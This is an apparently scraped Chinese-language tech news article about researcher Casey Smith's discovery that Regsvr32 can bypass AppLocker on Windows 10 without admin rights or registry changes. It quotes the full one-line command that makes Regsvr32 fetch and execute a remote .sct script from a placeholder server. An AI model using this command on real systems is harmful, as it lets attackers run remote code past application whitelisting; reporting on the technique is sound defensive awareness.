Regsvr32可用于绕过Windows 10上的applocker

视频: Configuring AppLocker in Windows Server 2019 | Active Directory Group Policy 2024

视频: Configuring AppLocker in Windows Server 2019 | Active Directory Group Policy 2024
Anonim

来自科罗拉多州的一位名为Casey Smith的研究人员发现,Regsvr32可用于绕过Windows 10上的AppLocker,这对于计算机用户(尤其是商业环境中的计算机用户)来说是一个大问题。

Windows 7和Windows Server 2008 R2中首次引入了AppLocker。 它旨在允许管理员根据文件的唯一标识指定哪个组或用户可以利用某些或所有应用程序。 如果您是一个倾向于使用AppLocker的人,那么应该知道它可以用于创建某些规则以允许应用程序在其运行或停止过程中使用。

对于那些可能不知道的人,Regvr32可用于注册和注销DLL。 这不是一键式工具,因为它是一个命令行实用程序,因此,只有高级计算机用户才应设法利用其提供的功能。

我们了解到,使用此技术不会改变计算机系统的注册表,这使管理员很难知道是否进行了任何更改。

regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll

“这里令人惊奇的是regsvr32已经支持代理,使用TLS,遵循重定向等。……而且……您猜到了一个签名的默认MS二进制文件。 因此,您所需要做的就是将.sct文件托管在您控制的位置。”史密斯写道。

上面的技术不需要管理特权,也不会更改注册表。 此外,可以通过HTTP或HTTPS调用脚本。 目前,Microsoft尚未针对此小问题发布补丁,因此,目前唯一的选择是通过Windows防火墙阻止Regsvr32。

有趣的是,该软件巨头尚未就其操作系统所面临的此安全问题作出回应。 现在已经公开,我们希望能听到公司的声音以及有关未来补丁的讨论。

Regsvr32可用于绕过Windows 10上的applocker